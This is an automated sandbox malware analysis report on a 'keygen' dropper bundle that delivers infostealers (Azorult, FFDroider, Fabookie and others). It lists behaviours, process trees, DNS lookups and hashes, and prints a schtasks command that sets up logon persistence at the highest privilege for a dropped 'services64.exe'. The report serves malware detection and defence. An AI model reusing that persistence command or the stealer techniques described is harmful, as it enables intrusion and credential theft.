Malware Analysis Report

2024-11-13 16:52

Sample ID 241108-2egzgazraz
Target 813d32b014bcf87216f8af360cdf257ccdbc2080f9dbd0924fe40753d0b84f46
SHA256 813d32b014bcf87216f8af360cdf257ccdbc2080f9dbd0924fe40753d0b84f46
Tags
azorult discovery infostealer trojan fabookie ffdroider gcleaner onlylogger evasion loader spyware stealer pony collection credential_access rat privateloader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

813d32b014bcf87216f8af360cdf257ccdbc2080f9dbd0924fe40753d0b84f46

Threat Level: Known bad

The file 813d32b014bcf87216f8af360cdf257ccdbc2080f9dbd0924fe40753d0b84f46 was found to be: Known bad.

Malicious Activity Summary

azorult discovery infostealer trojan fabookie ffdroider gcleaner onlylogger evasion loader spyware stealer pony collection credential_access rat privateloader

FFDroider

Ffdroider family

Pony,Fareit

Fabookie family

Pony family

Azorult family

Azorult

Onlylogger family

Detect Fabookie payload

Fabookie

Gcleaner family

Privateloader family

GCleaner

PrivateLoader

OnlyLogger

FFDroider payload

OnlyLogger payload

Executes dropped EXE

Loads dropped DLL

Reads data files stored by FTP clients

Unsecured Credentials: Credentials In Files

Deletes itself

Reads user/profile data of web browsers

Checks computer location settings

Looks up external IP address via web service

Accesses Microsoft Outlook accounts

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Checks whether UAC is enabled

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in Windows directory

System Network Configuration Discovery: Internet Connection Discovery

Enumerates physical storage devices

Unsigned PE

Program crash

System Location Discovery: System Language Discovery

Suspicious behavior: EnumeratesProcesses

outlook_win_path

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Scheduled Task/Job: Scheduled Task

Runs ping.exe

Checks SCSI registry key(s)

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-08 22:29

Signatures

Azorult family

azorult

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

134s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

memory/4376-0-0x0000000000400000-0x0000000000420000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win7-20240903-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2264 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2264 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2264 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2264 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104977 0

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.wpdsfds23x.com udp

Files

memory/2264-0-0x0000000000360000-0x0000000000445000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 265cadde82b0c66dc39ad2d9ee800754
SHA1 2e9604eade6951d5a5b4a44bee1281e32166f395
SHA256 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a
SHA512 c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b

memory/2776-12-0x00000000000F0000-0x00000000001D5000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

FFDroider

stealer ffdroider

FFDroider payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Ffdroider family

ffdroider

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services64.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4768 set thread context of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4804 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 4804 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 4804 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 2208 wrote to memory of 4144 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 2208 wrote to memory of 4144 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 2208 wrote to memory of 4144 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 4804 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 4804 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 4804 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 3944 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 3944 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 3944 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 3944 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 3944 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 3944 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 3944 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3944 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3944 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3944 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 3944 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 4804 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 4804 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 4804 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 1772 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 1772 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 2248 wrote to memory of 1680 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2248 wrote to memory of 1680 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1772 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 1772 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 4804 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 4804 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 4804 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 4804 wrote to memory of 3256 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
PID 4804 wrote to memory of 3256 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
PID 4804 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
PID 4804 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
PID 4804 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
PID 4768 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\System32\cmd.exe
PID 4768 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\System32\cmd.exe
PID 4768 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 4768 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 3576 wrote to memory of 2484 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3576 wrote to memory of 2484 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4768 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4768 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4768 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4768 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4768 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4768 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4768 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4768 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4768 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4768 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4768 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4768 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4768 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4768 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4768 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -a

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe"

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 788

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 824

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 804

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1012

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1144

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1136

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1392

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 544 -ip 544

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 544 -s 352

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\explorer.exe

